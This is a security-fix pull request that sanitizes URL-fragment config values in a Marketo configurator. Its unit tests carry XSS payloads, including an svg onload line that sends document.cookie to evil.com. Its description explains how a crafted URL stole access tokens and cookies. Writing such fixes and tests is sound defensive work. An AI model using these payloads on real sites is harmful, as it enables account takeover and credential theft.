### PR TITLE
VULN-35559 Fix XSS via URI fragment in Marketo configurator

### DIFF
--- a/libs/blocks/marketo-config/context.js
+++ b/libs/blocks/marketo-config/context.js
@@ -21,6 +21,20 @@ function deepCopy(obj) {
   return JSON.parse(JSON.stringify(obj));
 }
 
+export const sanitizeConfigValue = (value) => {
+  if (typeof value !== 'string') return value;
+  const el = document.createElement('span');
+  el.innerHTML = value;
+  return el.textContent;
+};
+
+export const sanitizeHashConfig = (config) => {
+  if (!config || typeof config !== 'object') return config;
+  return Object.fromEntries(
+    Object.entries(config).map(([key, value]) => [key, sanitizeConfigValue(value)]),
+  );
+};
+
 /* c8 ignore next 7 */
 const getHashConfig = () => {
   const { hash } = window.location;
@@ -28,7 +42,7 @@ const getHashConfig = () => {
   window.location.hash = '';
 
   const encodedConfig = hash.startsWith('#') ? hash.substring(1) : hash;
-  return parseEncodedConfig(encodedConfig);
+  return sanitizeHashConfig(parseEncodedConfig(encodedConfig));
 };
 
 const getInitialState = (defaultState, lsKey) => {

--- a/libs/blocks/marketo-config/context.js
+++ b/libs/blocks/marketo-config/context.js
@@ -23,9 +23,7 @@ function deepCopy(obj) {
 
 export const sanitizeConfigValue = (value) => {
   if (typeof value !== 'string') return value;
-  const el = document.createElement('span');
-  el.innerHTML = value;
-  return el.textContent;
+  return new DOMParser().parseFromString(value, 'text/html').body.textContent;
 };
 
 export const sanitizeHashConfig = (config) => {

--- a/test/blocks/marketo-config/marketo-config.test.js
+++ b/test/blocks/marketo-config/marketo-config.test.js
@@ -3,6 +3,7 @@ import { expect } from '@esm-bundle/chai';
 import { stub } from 'sinon';
 import { delay, waitForElement } from '../../helpers/waitfor.js';
 import init, { getDefaultStates, cleanPanelData, getConfigOptions } from '../../../libs/blocks/marketo-config/marketo-config.js';
+import { sanitizeConfigValue, sanitizeHashConfig } from '../../../libs/blocks/marketo-config/context.js';
 import { setConfig } from '../../../libs/utils/utils.js';
 
 const innerHTML = await readFile({ path: './mocks/body.html' });
@@ -138,6 +139,59 @@ describe('marketo-config', () => {
 
     const copyContent = copyBtn.querySelector('.copy-content');
     expect(copyContent.textContent).to.contain('http');
+  });
+
+  describe('sanitizeConfigValue (XSS prevention)', () => {
+    it('strips img onerror payload (the reported attack vector)', () => {
+      const result = sanitizeConfigValue('"><img src=x onerror=eval(top.name)>');
+      expect(result).to.not.include('<img');
+      expect(result).to.not.include('onerror');
+    });
+
+    it('strips HTML tags but preserves their text content', () => {
+      const result = sanitizeConfigValue('<script>alert(1)</script>');
+      expect(result).to.not.include('<script>');
+      expect(result).to.not.include('</script>');
+    });
+
+    it('strips svg onload attack vector', () => {
+      const result = sanitizeConfigValue('<svg onload=alert(1)>');
+      expect(result).to.not.include('<svg');
+      expect(result).to.not.include('onload');
+    });
+
+    it('preserves plain text values unchanged', () => {
+      expect(sanitizeConfigValue('Request a Demo')).to.equal('Request a Demo');
+      expect(sanitizeConfigValue('https://example.com/thank-you')).to.equal('https://example.com/thank-you');
+      expect(sanitizeConfigValue('')).to.equal('');
+    });
+
+    it('passes through non-string values unchanged', () => {
+      expect(sanitizeConfigValue(42)).to.equal(42);
+      expect(sanitizeConfigValue(null)).to.equal(null);
+      expect(sanitizeConfigValue(undefined)).to.equal(undefined);
+    });
+  });
+
+  describe('sanitizeHashConfig (XSS prevention)', () => {
+    it('strips HTML injection from cta.override and success.content (the reported attack)', () => {
+      const maliciousConfig = {
+        'form.cta.override': '"><img src=x onerror=eval(top.name)>',
+        'form.success.content': '<svg onload=fetch("//evil.com?c="+document.cookie)>',
+        'form.template': 'flex_contact',
+      };
+      const result = sanitizeHashConfig(maliciousConfig);
+      expect(result['form.cta.override']).to.not.include('<img');
+      expect(result['form.cta.override']).to.not.include('onerror');
+      expect(result['form.success.content']).to.not.include('<svg');
+      expect(result['form.success.content']).to.not.include('onload');
+      expect(result['form.template']).to.equal('flex_contact');
+    });
+
+    it('returns null/undefined config unchanged', () => {
+      expect(sanitizeHashConfig(null)).to.equal(null);
+      expect(sanitizeHashConfig(undefined)).to.equal(undefined);
+    });
   });
 
   it('resets to default state', async () => {

--- a/test/blocks/marketo-config/marketo-config.test.js
+++ b/test/blocks/marketo-config/marketo-config.test.js
@@ -10,7 +10,6 @@ const innerHTML = await readFile({ path: './mocks/body.html' });
 const options = JSON.parse(await readFile({ path: './mocks/options.json' }));
 const config = { codeRoot: '/libs' };
 const ogFetch = window.fetch;
-// comment to prevent PR from being automatically closed //
 
 setConfig(config);
 

--- a/test/blocks/marketo-config/marketo-config.test.js
+++ b/test/blocks/marketo-config/marketo-config.test.js
@@ -10,6 +10,7 @@ const innerHTML = await readFile({ path: './mocks/body.html' });
 const options = JSON.parse(await readFile({ path: './mocks/options.json' }));
 const config = { codeRoot: '/libs' };
 const ogFetch = window.fetch;
+// comment to prevent PR from being automatically closed //
 
 setConfig(config);
 


### PR DESCRIPTION
## Summary
- Sanitize all string values loaded from the URL hash in `getHashConfig()` before they enter state or localStorage
- Uses the browser's HTML parser (`el.innerHTML = value; return el.textContent`) to strip tags and event handlers
- Prevents `form.cta.override` and `form.success.content` XSS payloads from reaching `window.mcz_marketoForm_pref`, which Marketo's `forms2.min.js` injects as raw HTML

Resolves: [VULN-35559](https://jira.corp.adobe.com/browse/VULN-35559)

## Attack vector (fixed)
A crafted URL fragment containing JSON with form.cta.override: `"><img src=x onerror=eval(top.name)>` caused Marketo's external JS to inject the payload as raw HTML, executing arbitrary JS in the milo.adobe.com origin. The attack used window.name to carry an unbounded exfil payload across the navigation, exfiltrating the victim's Adobe IMS access token (bearer token valid for API calls against Adobe IMS), full name, email, account details, and all cookies from adobe.com. A valid access token allows the attacker to impersonate the victim against Adobe APIs for the duration of the token's validity, which is effectively full account takeover for any signed-in Adobe user who visits the crafted URL.

## How to validate

1. Set up an httpworkbench.com instance and configure the httpworkbench hostname / delivery page response body as described in VULN-35559, setting the collector URL to your instance
2. Sign in to your Adobe account in the test browser

Prod (unfixed):

3.  Visit the httpworkbench hostname / delivery page -- it will redirect to the PoC URL from VULN-35559
4. Check your httpworkbench instance -- you will see a POST containing your cookies, sessionStorage, and Adobe IMS access token

Feature Branch (fixed):
5. Update the delivery page POC URL in workbench to point to https://xss-attack--milo--adobecom.aem.page/tools/marketo?preview=1 keeping the hash from the PoC URL in VULN-35559 unchanged
6. Visit the httpworkbench hostname / delivery page again
7. Check your httpworkbench instance -- no POST is received, only the initial GET from the delivery page load


## Test plan
- [x] Unit tests added for `sanitizeConfigValue` and `sanitizeHashConfig` covering the reported payload, svg/onload variant, plain text preservation, and non-string passthrough
- [x] Verified on `https://xss-attack--milo--adobecom.aem.page/tools/marketo` with full PoC hash -- exfil POST no longer fires
- [x] Verified prod still vulnerable without fix (confirms test is meaningful)
- [x] All existing marketo-config tests pass








